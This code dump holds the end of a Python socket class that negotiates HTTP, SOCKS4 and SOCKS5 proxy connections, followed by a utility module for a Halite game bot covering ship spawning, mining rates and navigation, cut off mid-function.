@so_socket.onchanged()\r\n def so_socket(self, old, new):\r\n self.signal('socketChanged').emit(old, new)\r\n\r\n #===========================================================================\r\n # handy methods\r\n #===========================================================================\r\n def config(self, **kwargs):\r\n for k, v in kwargs.items():\r\n setattr(self, 'so_'+k, v)\r\n \r\n def status(self):\r\n try:\r\n if self.so_socket.getsockopt(SOL_SOCKET, SO_ACCEPTCONN):\r\n return SockStatus.ACCEPTING\r\n except AttributeError:\r\n return SockStatus.CLOSED\r\n except error as err:\r\n if err.args[0]==errno.EBADF:\r\n return SockStatus.CLOSED\r\n else:\r\n return SockStatus.UNKNOWN\r\n sock, peer = self.addrs()\r\n if sock==peer==None:\r\n return SockStatus.CREATED\r\n if 
all((sock, peer)):\r\n return SockStatus.CONNECTED \r\n if peer==None:\r\n return SockStatus.BOUND\r\n return SockStatus.UNKNOWN\r\n \r\n def addrs(self):\r\n try:\r\n sockname = self.so_socket.getsockname()\r\n except:\r\n sockname = None\r\n \r\n if self.so_proxy_peer:\r\n peername = self.so_proxy_peer\r\n else:\r\n try:\r\n peername = self.so_socket.getpeername()\r\n except:\r\n peername = None\r\n return sockname, peername\r\n\r\n #===========================================================================\r\n # proxy handling interfaces\r\n #===========================================================================\r\n def _connect_with(self, method, address):\r\n if not self.so_proxy:\r\n method(address)\r\n else:\r\n if self.so_proxy.type.lower() == 'http':\r\n port = self.so_proxy.port or 8080\r\n # .lower must be called, and the names must match the _nego_socks4/_nego_socks5 handlers below\r\n elif self.so_proxy.type.lower() in ['socks4', 'socks5']:\r\n port = self.so_proxy.port or 1080\r\n else:\r\n raise ProxyError('unknown proxy type: %s' % self.so_proxy.type)\r\n \r\n method((self.so_proxy.host, port))\r\n getattr(self, '_nego_'+self.so_proxy.type.lower())(self.so_proxy, address)\r\n self.setblocking(self.so_blocking)\r\n\r\n def _nego_http(self, proxy, address):\r\n template = \"CONNECT %s HTTP/1.1\\r\\n\" \\\r\n \"Accept-Encoding: identity\\r\\n\" \\\r\n \"Host: %s\\r\\n\" \\\r\n \"Connection: close\\r\\n\"\r\n \r\n authtemplate = \"Proxy-Authorization: Basic %s\\r\\n\"\r\n \r\n host, port = address\r\n if proxy.rdns:\r\n addr = host\r\n else:\r\n addr = gethostbyname(host)\r\n port = str(port)\r\n \r\n req = template %(addr + \":\" + port, host)\r\n if proxy.user and proxy.password:\r\n user_pass = '%s:%s' % (unquote(proxy.user), unquote(proxy.password))\r\n creds = b64encode(user_pass).strip()\r\n req += authtemplate %creds\r\n req += '\\r\\n'\r\n \r\n self.sendall(req)\r\n # We read the response until we get the string \"\\r\\n\\r\\n\"\r\n resp = self.recv(1)\r\n while resp.find(\"\\r\\n\\r\\n\")==-1:\r\n resp = resp + self.recv(1)\r\n # We just need the first line to check if the connection\r\n # was successful\r\n statusline = resp.splitlines()[0].split(\" \",2)\r\n if statusline[0] not in (\"HTTP/1.0\",\"HTTP/1.1\"):\r\n self.so_socket.close()\r\n raise ProxyError('no response from proxy server')\r\n try:\r\n statuscode = int(statusline[1])\r\n except ValueError:\r\n self.so_socket.close()\r\n raise ProxyError('invalid response from proxy server')\r\n \r\n if statuscode != 200:\r\n self.so_socket.close()\r\n raise ProxyError('cannot connect to target [http proxy status code %s]' %str(statuscode))\r\n \r\n self.so_proxy_peer = address\r\n self.so_proxy_sock = (\"0.0.0.0\",0)\r\n\r\n def _nego_socks5(self, proxy, address):\r\n def recv(length):\r\n data = \"\"\r\n while len(data) < length:\r\n data = data + self.recv(length-len(data))\r\n return data\r\n \r\n # First we'll send the authentication packages we support.\r\n if proxy.user and proxy.password:\r\n # The username/password details were supplied to the\r\n # setproxy method so we support the USERNAME/PASSWORD\r\n # authentication (in addition to the standard none).\r\n self.sendall(\"\\x05\\x02\\x00\\x02\")\r\n else:\r\n # No username/password were entered, therefore we\r\n # only support connections with no authentication.\r\n self.sendall(\"\\x05\\x01\\x00\")\r\n # We'll receive the server's response to determine which\r\n # method was selected\r\n chosenauth = recv(2)\r\n if chosenauth[0] != \"\\x05\":\r\n self.close()\r\n raise ProxyError('socks5 proxy is not supported by server')\r\n # Check the chosen authentication method\r\n if chosenauth[1] == \"\\x00\":\r\n # No authentication is required\r\n 
pass\r\n elif chosenauth[1] == \"\\x02\":\r\n # Okay, we need to perform a basic username/password\r\n # authentication.\r\n self.sendall(\"\\x01\" + chr(len(proxy.user)) + proxy.user + chr(len(proxy.password)) + proxy.password)\r\n authstat = recv(2)\r\n if authstat[0] != \"\\x01\":\r\n # Bad response\r\n self.close()\r\n raise ProxyError('bad authentication request')\r\n if authstat[1] != \"\\x00\":\r\n # Authentication failed\r\n self.close()\r\n raise ProxyError('Authentication failed')\r\n # Authentication succeeded\r\n else:\r\n # Reaching here is always bad\r\n self.close()\r\n if chosenauth[1] == \"\\xFF\":\r\n raise ProxyError('connection not allowed by ruleset')\r\n else:\r\n raise ProxyError('invalid data from socks5 proxy server')\r\n # Now we can request the actual connection\r\n req = \"\\x05\\x01\\x00\"\r\n # If the given destination address is an IP address, we'll\r\n # use the IPv4 address request even if remote resolving was specified.\r\n \r\n try:\r\n ipaddr = inet_aton(address[0])\r\n req = req + \"\\x01\" + ipaddr\r\n except error:\r\n # 'error' is the exception class imported from the socket module at the top of this file;\r\n # the bare 'socket' name here is the socket class, which has no .error attribute.\r\n # Well it's not an IP number, so it's probably a DNS name.\r\n if proxy.rdns:\r\n # Resolve remotely\r\n ipaddr = None\r\n req = req + \"\\x03\" + chr(len(address[0])) + address[0]\r\n else:\r\n # Resolve locally\r\n ipaddr = inet_aton(gethostbyname(address[0]))\r\n req = req + \"\\x01\" + ipaddr\r\n req = req + struct.pack(\">H\", address[1])\r\n self.sendall(req)\r\n # Get the response\r\n resp = recv(4)\r\n if resp[0] != \"\\x05\":\r\n self.close()\r\n raise ProxyError('socks5 proxy is not supported by server')\r\n elif resp[1] != \"\\x00\":\r\n # Connection failed\r\n self.close()\r\n if ord(resp[1])<=8:\r\n raise ProxyError('socks5 proxy error: %d' %ord(resp[1]))\r\n else:\r\n raise ProxyError('socks5 proxy error: unknown')\r\n # Get the bound address/port\r\n elif resp[3] == \"\\x01\":\r\n boundaddr = recv(4) #IPv4 address\r\n elif resp[3] == \"\\x03\":\r\n resp = resp + recv(1)\r\n boundaddr = recv(ord(resp[4])) #Domain name\r\n elif resp[3] == \"\\x04\":\r\n boundaddr = recv(16) #IPv6 address\r\n else:\r\n self.close()\r\n raise ProxyError('invalid data from socks5 proxy server')\r\n boundport = struct.unpack(\">H\",recv(2))[0]\r\n self.so_proxy_sock = (boundaddr, boundport)\r\n if ipaddr != None:\r\n self.so_proxy_peer = (inet_ntoa(ipaddr), address[1])\r\n else:\r\n self.so_proxy_peer = address\r\n\r\n def _nego_socks4(self, proxy, address):\r\n def recv(length):\r\n data = \"\"\r\n while len(data) < length:\r\n data = data + self.recv(length-len(data))\r\n return data\r\n \r\n # Check if the destination address provided is an IP address\r\n rmtrslv = False\r\n try:\r\n ipaddr = inet_aton(address[0])\r\n except error:\r\n # It's a DNS name. 
Check where it should be resolved.\r\n if proxy.rdns:\r\n ipaddr = \"\\x00\\x00\\x00\\x01\"\r\n rmtrslv = True\r\n else:\r\n ipaddr = inet_aton(gethostbyname(address[0]))\r\n # Construct the request packet\r\n req = \"\\x04\\x01\" + struct.pack(\">H\", address[1]) + ipaddr\r\n # The username parameter is considered userid for SOCKS4\r\n if proxy.user != None:\r\n req = req + proxy.user\r\n req = req + \"\\x00\"\r\n # DNS name if remote resolving is required\r\n # NOTE: This is actually an extension to the SOCKS4 protocol\r\n # called SOCKS4A and may not be supported in all cases.\r\n if rmtrslv==True:\r\n req = req + address[0] + \"\\x00\"\r\n self.sendall(req)\r\n # Get the response from the server\r\n resp = recv(8)\r\n if resp[0] != \"\\x00\":\r\n # Bad data\r\n self.close()\r\n raise ProxyError('invalid data from socks4 proxy server')\r\n if resp[1] != \"\\x5A\":\r\n # Server returned an error\r\n self.close()\r\n # compare against integers: ord() returns an int, never a hex string\r\n if ord(resp[1]) in (0x5b, 0x5c, 0x5d):\r\n self.close()\r\n raise ProxyError('socks4 proxy error: %d' %ord(resp[1]))\r\n else:\r\n raise ProxyError('socks4 proxy error: unknown')\r\n # Get the bound address/port\r\n self.so_proxy_sock = (inet_ntoa(resp[4:]),struct.unpack(\">H\",resp[2:4])[0])\r\n # local resolve: report the numeric peer; remote resolve: keep the hostname\r\n if not rmtrslv:\r\n self.so_proxy_peer = (inet_ntoa(ipaddr),address[1])\r\n else:\r\n self.so_proxy_peer = address\r\n\r\n ## socket interface\r\n def __init__(self, family=2, type=1, proto=0, **kwargs): #@ReservedAssignment\r\n self.config(family=family, type=type, proto=proto)\r\n self.config(**kwargs)\r\n \r\n def connect(self, address):\r\n self._connect_with(self.so_socket.connect, address)\r\n\r\n def connect_ex(self, address):\r\n self._connect_with(self.so_socket.connect_ex, address)\r\n \r\n def setblocking(self, blocking) :\r\n self.so_blocking = blocking\r\n return self.so_socket.setblocking(blocking)\r\n \r\n def getblocking(self):\r\n return self.so_blocking\r\n \r\n def settimeout(self, timeout) :\r\n self.so_timeout = timeout\r\n return self.so_socket.settimeout(timeout)\r\n \r\n def getpeername(self) :\r\n return self.so_socket.getpeername()\r\n \r\n def getsockname(self) :\r\n return self.so_socket.getsockname()\r\n \r\n def gettimeout(self) :\r\n return self.so_socket.gettimeout()\r\n \r\n def accept(self) :\r\n return self.so_socket.accept()\r\n\r\n def bind(self, *args) :\r\n return self.so_socket.bind(*args)\r\n \r\n def close(self) :\r\n self.so_proxy_sock = None\r\n self.so_proxy_peer = None\r\n try:\r\n self.so_socket.close()\r\n except:\r\n pass\r\n \r\n def fileno(self) :\r\n return self.so_socket.fileno()\r\n\r\n def getsockopt(self, *args) :\r\n return self.so_socket.getsockopt(*args)\r\n \r\n def listen(self, *args) :\r\n return self.so_socket.listen(*args)\r\n \r\n def makefile(self, *args) :\r\n return self.so_socket.makefile(*args)\r\n \r\n def recv(self, *args) :\r\n return self.so_socket.recv(*args)\r\n \r\n def recvfrom(self, *args) :\r\n return self.so_socket.recvfrom(*args)\r\n\r\n def recvfrom_into(self, *args) :\r\n return self.so_socket.recvfrom_into(*args)\r\n \r\n def recv_into(self, *args) :\r\n # pass the caller's arguments straight through; the old code passed the builtin 'buffer'\r\n return self.so_socket.recv_into(*args)\r\n \r\n def send(self, *args) :\r\n return self.so_socket.send(*args)\r\n \r\n def sendall(self, *args) :\r\n return self.so_socket.sendall(*args)\r\n \r\n def sendto(self, *args) :\r\n return self.so_socket.sendto(*args)\r\n \r\n def setsockopt(self, *args):\r\n return self.so_socket.setsockopt(*args)\r\n \r\n def shutdown(self, *args):\r\n return 
","sub_path":"xyproj/src/xy/core/sock.py","file_name":"sock.py","file_ext":"py","file_size_in_byte":15378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"366617412","text":"#\n# Mybot code\n#\n\n# This library contains constant values.\nfrom hlt import constants\n\n# This library contains direction metadata to better interface with the game.\nfrom hlt.positionals import Position\nfrom hlt.positionals import Direction\n\nfrom hlt.entity import Shipyard\n\nimport os\nimport time\nimport math\nimport random\nimport logging\nimport numpy as np\n\n# mybot utils\nfrom myutils.constants import *\nfrom myutils.cell_block import *\n\ndef get_mining_rate(game, turns = None, ship_id = None):\n    '''\n    Returns the mining rate for the game or a specific ship. Always returns\n    a rate of at least 1.\n    '''\n\n    if len(game.game_metrics[\"mined\"]) == 0:\n        return 1\n\n    if turns is None:\n        turns = game.turn_number\n\n    oldest_turn = 1 if game.turn_number < turns else (game.turn_number - turns)\n    i = len(game.game_metrics[\"mined\"]) - 1\n\n    mined = []\n    mined_by_ship = {}\n\n    # each metrics entry is (turn, ship.id, mined)\n    while i >= 0 and game.game_metrics[\"mined\"][i][0] > oldest_turn:\n        s_id = game.game_metrics[\"mined\"][i][1]\n        halite = game.game_metrics[\"mined\"][i][2]\n        mined_by_ship[s_id] = mined_by_ship[s_id] + halite if s_id in mined_by_ship else halite\n        i -= 1\n\n    if ship_id is None:\n        for s_id, halite in mined_by_ship.items():\n            mined.append(halite / (game.turn_number - game.ship_christenings[s_id] - 1))\n\n        rate = np.average(mined)\n    else:\n        # index the dict directly (mined_by_ship.items is a method, not a mapping)\n        rate = mined_by_ship[ship_id] / (game.turn_number - game.ship_christenings[ship_id] - 1)\n\n    return rate\n\n
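# --- Illustrative sketch (added example; all numbers here are assumed) ---\n# How ships_are_spawnable() below uses this rate: a new ship costing\n# constants.SHIP_COST = 1000 halite at a recent rate of 25 halite/turn needs\n# 1000 / 25 = 40 turns to pay for itself; with an overhead factor of 2 the\n# bot keeps spawning only while at least 80 turns remain.\ndef payback_turns_example(ship_cost, mining_rate, over_head=2):\n    # turns a new ship needs before it has paid for itself, with overhead\n    return round(ship_cost / max(mining_rate, 1)) * over_head\n\n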
Occupied cells: {}\".format(occupied_cells))\n return False\n\n # primary constraint\n #\n # New code\n #\n #payback_turns = constants.SHIP_COST / get_mining_rate(game, MINING_RATE_LOOKBACK)\n #remaining_turns = constants.MAX_TURNS - game.turn_number\n #if payback_turns * mining_over_head < remaining_turns:\n\t#\t if DEBUG & (DEBUG_GAME): logging.info(\"Spawn retval: {}\".format(retval))\n # return False\n #\n #return True\n\n ###\n ### v6 old code\n ###\n if me.ship_count > 0:\n payback_turns = constants.SHIP_COST / get_mining_rate(game, MINING_RATE_LOOKBACK)\n remaining_turns = constants.MAX_TURNS - game.turn_number\n\n retval = round(payback_turns * mining_over_head) < remaining_turns\n if DEBUG & (DEBUG_GAME): logging.info(\"Spawn retval: {}\".format(retval))\n\n return retval\n else:\n return True\n\n#\n#\n#\ndef get_max_loiter_distance(game):\n max_loiter_dist_x = min(game.me.shipyard.position.x, (game.game_map.width - game.me.shipyard.position.x))\n max_loiter_dist_y = min(game.me.shipyard.position.y, (game.game_map.height - game.me.shipyard.position.y))\n max_loiter_distance = min(max_loiter_dist_x, max_loiter_dist_y, MAX_LOITER)\n\n return float(max_loiter_distance)\n\n#\n#\n#\ndef get_min_loiter_distance(game):\n # when a ship is sent off from the shipyard, this is the max distance. It set\n # dynamically. The min loiter distance is stored as an offset, see min_loiter_distance\n return float(MIN_LOITER)\n\n#\n#\n#\ndef get_loiter_multiple(game):\n\n # when a ship is sent off from the shipyard, this is the max distance it navigates\n # before 'exploring'\n min_loiter_distance = get_min_loiter_distance(game)\n\n #\n # stdist\n #\n # scipy lib is installed on server env by default\n #from scipy.stats import norm\n #\n # 0.3989422804014327 @ loc=0, scale=1.0\n # smaller number reduces tail flatness\n #inputWidth = 5.0\n #maxNorm = norm.pdf(0, loc=0, scale=1.0)\n #loiterMult = norm.pdf(inputWidth/2.0 - ((game.turn_number - 1)/constants.MAX_TURNS) * inputWidth, loc=0, scale=1.0)/maxNorm * maxLoiterDist\n\n #\n # atan\n #\n # inputOffset values shift curve left so we get into the steep part earlier\n #inputOffset = 75\n #\n # std value is pi? 
large inputWidth values result in 'more tail', small value move toward a strait line\n #inputWidth = math.pi * 2.0\n #\n #maxArcTan = math.atan(inputWidth - inputWidth/2) + math.atan(inputWidth/2)\n #loiterMult = math.atan(((game.turn_number - 1.0 + inputOffset)/constants.MAX_TURNS) * inputWidth - (inputWidth/2.0)) + math.atan(inputWidth/2.0)\n #loiterMult = loiterMult / maxArcTan * get_max_loiter_distance(game)\n\n #\n # linear\n #\n #loiterMult = (float(game.turn_number - 1) / float(constants.MAX_TURNS)) * get_max_loiter_distance(game)\n\n # based on area\n loiterMult = math.sqrt(game.turn_number - 1.0) / math.sqrt(constants.MAX_TURNS) * get_max_loiter_distance(game)\n\n # make sure we don't a useless mult\n if loiterMult < min_loiter_distance:\n loiterMult = min_loiter_distance\n\n return loiterMult\n\n#\n# type: 'random', 'density'\n# collision_resolution: 'random', 'density', 'navigate'\n#\ndef get_move(game, ship, type=\"random\", collision_resolution=\"random\"):\n if type == \"random\":\n move = get_random_move(game, ship)\n elif type == \"density\":\n move = get_density_move(game, ship)\n else:\n raise RuntimeError(\"Unknown move type: \" + str(type))\n\n return move\n\n#\n# returns a dict indexed on 'n', 's', 'e', 'w' of 3x3 lists of cells\n#\ndef get_surrounding_cell_blocks(game, ship, w, h):\n t = CellBlock.get_corner_offset(\"n\", w, h)\n north_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"s\", w, h)\n south_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"e\", w, h)\n east_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"w\", w, h)\n west_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n return [\n (Direction.North, CellBlock(game, north_corner, w, h)),\n (Direction.South, CellBlock(game, south_corner, w, h)),\n (Direction.East, CellBlock(game, east_corner, w, h)),\n (Direction.West, CellBlock(game, west_corner, w, h))\n ]\n\n#\n# nav moves resolv first by density, then randomly\n#\ndef get_density_move(game, ship):\n\n move = \"o\"\n\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - ship {} is getting a density based move\".format(ship.id))\n\n if not check_fuel_cost(game, ship):\n return move\n\n moves = []\n for quadrant in get_surrounding_cell_blocks(game, ship, 3, 3):\n directional_offset = quadrant[0]\n block = quadrant[1]\n\n if block.get_max() > constants.MAX_HALITE * MINING_THRESHOLD_MULT:\n moves.append((directional_offset, block, block.get_mean()))\n\n sorted_blocks = sorted(moves, key=lambda item: item[2], reverse=True)\n\n if len(sorted_blocks) == 0:\n return get_random_move(game, ship) # FIX ME FIX ME FIX ME FIX ME FIX ME FIX ME would be better to try a large search radius ???\n\n best_bloc_data = sorted_blocks[0]\n\n max_cell = best_bloc_data[1].get_max()\n\n bc = best_bloc_data[1].get_cells()\n\n for best_cell in bc:\n if best_cell.halite_amount == max_cell:\n break\n\n move_offset = best_bloc_data[0]\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} moveOffset: {}\".format(ship.id, move_offset))\n\n new_position = game.game_map.normalize(ship.position.directional_offset(move_offset))\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} new_position: {}\".format(ship.id, new_position))\n\n normalized_position = game.game_map.normalize(new_position)\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} normalized_position: {}\".format(ship.id, normalized_position))\n\n 
cell = game.game_map[normalized_position]\n\n    if not cell.is_occupied:\n        move = Direction.convert(move_offset)\n        cell.mark_unsafe(ship)\n        game.game_map[ship.position].mark_safe()\n\n    # if we were not able to find a usable dense cell, try to find a random one\n    if move == \"o\":\n        if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} Collision, trying to find a random move\".format(ship.id))\n        lateral_offsets = Direction.laterals(move_offset)\n        lateral_moves = list(map(lambda direction_offset: Direction.convert(direction_offset), lateral_offsets))\n        move = get_random_move(game, ship, lateral_moves)\n\n        if move == \"o\":\n            if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} Collision, unable to find a move\".format(ship.id))\n\n    move_plus_one = Position(best_cell.position.x, best_cell.position.y) # go one more move in the same direction\n    if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} has a move_plus_one of {}\".format(ship.id, move_plus_one))\n    ship.path.append(move_plus_one)\n\n    return move\n\n#\n# nav moves resolve randomly\n#\ndef get_random_move(game, ship, moves = [\"n\", \"s\", \"e\", \"w\"]):\n\n    move = \"o\"\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} getting random move\".format(ship.id))\n\n    if not check_fuel_cost(game, ship):\n        return move\n\n    # start the scan at a random index so ships don't all prefer the same direction\n    moveIdx = random.randint(0, len(moves) - 1)\n\n    for idx in range(moveIdx, moveIdx + len(moves)):\n        moveChoice = moves[idx % len(moves)]\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} moveChoice: {} {}\".format(ship.id, idx, moveChoice))\n\n        new_position = ship.position.directional_offset(DIRECTIONS[moveChoice])\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} new_position: {}\".format(ship.id, new_position))\n\n        normalized_position = game.game_map.normalize(new_position)\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} normalized_position {}\".format(ship.id, normalized_position))\n\n        cell = game.game_map[normalized_position]\n\n        if not cell.is_occupied:\n            cell.mark_unsafe(ship)\n            game.game_map[ship.position].mark_safe()\n            move = moveChoice\n            break\n\n    return move\n\n
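# --- Illustrative sketch (added example; not used by the bot) ---\n# get_random_move() above starts at a random index and wraps around the\n# candidate directions; this standalone helper just makes that scan order\n# explicit.\ndef random_scan_order_example(start_idx, moves=(\"n\", \"s\", \"e\", \"w\")):\n    # e.g. start_idx=2 yields ['e', 'w', 'n', 's']\n    return [moves[i % len(moves)] for i in range(start_idx, start_idx + len(moves))]\n\n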
#\n# destination - The direction the ship is trying to go. Backoff will be opposite\n#\ndef get_backoff_point(game, ship, destination):\n    destinationMoves = game.game_map.get_unsafe_moves(ship.position, destination)\n\n    if len(destinationMoves) == 0:\n        return ship.position\n\n    choice = random.choice(destinationMoves)\n    backoffDirection = Direction.invert(choice)\n\n    # when there's a collision, we back off between 1 and nShips/2 cells\n    mult = random.randint(1, max(1, round(len(game.me.get_ships()) / 2)))\n\n    backoffPoint = ship.position + Position(backoffDirection[0] * mult, backoffDirection[1] * mult)\n\n    # if the backoff point wraps, truncate it to the edge to prevent simple nav from failing\n    if backoffPoint.x > game.game_map.width - 1:\n        backoffPoint.x = game.game_map.width - 1\n\n    if backoffPoint.x < 0:\n        backoffPoint.x = 0\n\n    if backoffPoint.y > game.game_map.height - 1:\n        backoffPoint.y = game.game_map.height - 1\n\n    if backoffPoint.y < 0:\n        backoffPoint.y = 0\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"Nav.get_backoff_point() - ship {} has backoffPoint {}\".format(ship.id, backoffPoint))\n\n    return backoffPoint\n\n#\n#\n#\ndef get_dropoff_position(game, ship):\n    dropoffs = game.me.get_dropoffs()\n    destinations = list(dropoffs) + [game.me.shipyard.position]\n\n    minDistance = False\n    movePosition = False\n\n    for dest in destinations:\n        distance = game.game_map.calculate_distance(ship.position, dest)\n        if minDistance is False or distance < minDistance:\n            minDistance = distance\n            movePosition = dest\n\n    return movePosition\n\n#\n# nav moves follow the ship's precomputed path\n#\n# waypoint_algorithm: if a point is not continuous, then calc path using waypoint_algorithm\n#\ndef get_nav_move(game, ship, waypoint_algorithm = \"astar\", args = {\"move_cost\": \"turns\"}):\n    game_map = game.game_map\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} getting nav move for path {}\".format(ship.id, ship.path))\n\n    if not check_fuel_cost(game, ship):\n        return 'o'\n\n    if len(ship.path) == 0:\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} empty path\".format(ship.id))\n        return 'o'\n\n    next_position = ship.path[len(ship.path) - 1]\n\n    # check to see if we have a waypoint, not a continuous path\n    if game_map.calculate_distance(ship.position, next_position) > 1:\n        normalized_next_position = game_map.normalize(next_position)\n\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} found waypoint {}, calculating complete path\".format(ship.id, next_position))\n\n        # calc a continuous path\n        path, cost = game_map.navigate(ship.position, normalized_next_position, waypoint_algorithm, args)\n\n        if path is None or len(path) == 0:\n            if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} Nav failed, can't reach {} from {}\".format(ship.id, normalized_next_position, ship.position))\n            return 'o'\n        else:\n            if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} path to waypoint {} found with a cost of {} ({} turns)\".format(ship.id, next_position, round(cost), len(path)))\n            ship.path.pop()\n            ship.path = ship.path + path\n\n    new_position = ship.path[len(ship.path) - 1]\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} new_position: {}\".format(ship.id, new_position))\n\n    normalized_new_position = game_map.normalize(new_position)\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} normalized_new_position: {}\".format(ship.id, normalized_new_position))\n\n    # why?\n    if normalized_new_position == ship.position:\n        if DEBUG & (DEBUG_NAV): logging.warning(\"NAV - ship {} popped move {}. Why?\".format(ship.id, ship.path[-1]))\n        ship.path.pop()\n        return 'o'\n\n    cell = game_map[normalized_new_position]\n\n    # use get_unsafe_moves() to get a normalized directional offset. We should always get one solution.\n    offset = game_map.get_unsafe_moves(ship.position, normalized_new_position)[0]\n    move = Direction.convert(offset)\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} has potential move: {}\".format(ship.id, move))\n\n    # once we have the move, handle collisions\n    if cell.is_occupied:\n        if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} has a collision at {} while moving {}\".format(ship.id, normalized_new_position, move))\n        # don't let enemy ships block the dropoff\n        if cell.structure_type is Shipyard and cell.ship.owner != game.me.id:\n            cell.mark_unsafe(ship)\n            game.game_map[ship.position].mark_safe()\n            ship.path.pop()\n        # when arriving at a dropoff, wait for entry rather than making a random move\n        # this probably will not work as well if not using entry/exit lanes\n        elif game_map.calculate_distance(normalized_new_position, game.me.shipyard.position) <= 1:\n            move = \"o\"\n        # when departing a shipyard, try not to head in the wrong direction\n        elif ship.position == game.me.shipyard.position:\n            alternate_moves = Direction.laterals(move)\n            move = \"o\"\n            for alternate_move_offset in alternate_moves:\n                alternate_pos = ship.position.directional_offset(alternate_move_offset)\n                alternate_cell = game_map[alternate_pos]\n                if not alternate_cell.is_occupied:\n                    alternate_cell.mark_unsafe(ship)\n                    game.game_map[ship.position].mark_safe()\n                    move = Direction.convert(alternate_move_offset)\n                    break # take the first free lateral cell\n        else:\n            move = get_random_move(game, ship)\n            if move == \"o\":\n                if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} collision at {} with ship {}, using {}\".format(ship.id, normalized_new_position, cell.ship.id, move))\n    else:\n        cell.mark_unsafe(ship)\n        game.game_map[ship.position].mark_safe()\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} popped path {}\".format(ship.id, ship.path[-1]))\n        ship.path.pop()\n\n    return move\n\n#\n# Returns True if ship has enough fuel to move\n#\ndef check_fuel_cost(game, ship):\n    fuelCost = game.game_map[ship.position].halite_amount * .1\n\n    if round(fuelCost) > ship.halite_amount:\n        if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} has insufficient fuel. 
Have {}, need {}\".format(ship.id, ship.halite_amount, round(fuelCost, 2)))\n return False\n\n return True\n\n#\n#\n#\ndef dump_stats(game, data, key = \"all\"):\n if key == \"all\":\n keys = data.keys()\n else:\n keys = [key]\n\n ts = time.strftime(\"%Y%m%d-%s\", time.gmtime())\n\n if os.path.exists(STATS_DIR):\n stats_dir = STATS_DIR\n else:\n stats_dir = \".\"\n\n for k in keys:\n with open(stats_dir + '/' + k + \"-\" + ts + \"-bot-\" + str(game.me.id) + \".log\", \"w\") as f:\n for line in data[k]:\n f.write(str(line) + \"\\n\")\n\ndef dump_data_file(game, data, file_basename):\n \"\"\"\n Dump random data for debugging/analysis\n\n file_basename - no extension\n data - numpy array\n \"\"\"\n\n ts = time.strftime(\"%Y%m%d-%s\", time.gmtime())\n\n if os.path.exists(STATS_DIR):\n stats_dir = STATS_DIR\n else:\n stats_dir = \".\"\n\n np.set_printoptions(precision=1, linewidth=240, suppress=True, threshold=np.inf)\n\n data_str = np.array2string(data.astype(np.int64), separator=\",\")\n\n with open(stats_dir + '/' + file_basename + \"-\" + ts + \"-bot-\" + str(game.me.id) + \".log\", \"w\") as f:\n f.write(data_str)\n\ndef should_move(game, ship):\n cell_halite = game.game_map[ship.position].halite_amount\n\n if ship.is_full:\n return True\n\n if cell_halite < constants.MAX_HALITE * MINING_THRESHOLD_MULT:\n return True\n\n# cargo_threshold = .95 * constants.MAX_HALITE\n# logging.debug(\"DEBUG cargo {} > cargo threshold {} === {}\".format(ship.halite_amount, cargo_threshold, ship.halite_amount > cargo_threshold))\n# if ship.halite_amount > cargo_threshold and ship.status == \"returning\":\n# return True\n\n# remaining_cargo_capacity = constants.MAX_HALITE - ship.halite_amount\n# mining_yield = cell_halite * .25\n# logging.debug(\"DEBUG {} >= {} === {}\".format(mining_yield, remaining_cargo_capacity, mining_yield < remaining_cargo_capacity))\n# if mining_yield < remaining_cargo_capacity and ship.status == \"returning\":\n# return True\n\n return False\n\ndef get_loiter_point(game, ship, hint = None):\n \"\"\"\n After a ship complets a dropoff, assign it a new destination whose distance is\n based on game number and direction is random\n\n 1. get the loiter distance (multiplier)\n 2. get a random point on a circle an mult by the loiter multiple\n 3. extend the circle x,y by the loiter distance to create an offset\n 4. Add the offset to the current position to get the loiter point\n 5. 
def get_loiter_point(game, ship, hint = None):\n    \"\"\"\n    After a ship completes a dropoff, assign it a new destination whose distance is\n    based on the game turn number and whose direction is random\n\n    1. get the loiter distance (multiplier)\n    2. get a random point on a circle and multiply by the loiter multiple\n    3. extend the circle x,y by the loiter distance to create an offset\n    4. Add the offset to the current position to get the loiter point\n    5. Calc a nav path to the loiter point\n    \"\"\"\n    loiter_distance = get_loiter_multiple(game)\n\n    if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} loiter_distance: {}\".format(ship.id, loiter_distance))\n    if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"loiter_multiples\"].append((game.turn_number, round(loiter_distance, 2)))\n\n    # get a random point on a circle in radians, note that +y is down\n    if hint is None:\n        pt = random.uniform(0, math.pi * 2)\n    elif hint == \"n\":\n        pt = random.uniform(7*math.pi/4, 5*math.pi/4)\n    elif hint == \"s\":\n        pt = random.uniform(3*math.pi/4, math.pi/4)\n    elif hint == \"e\":\n        pt = 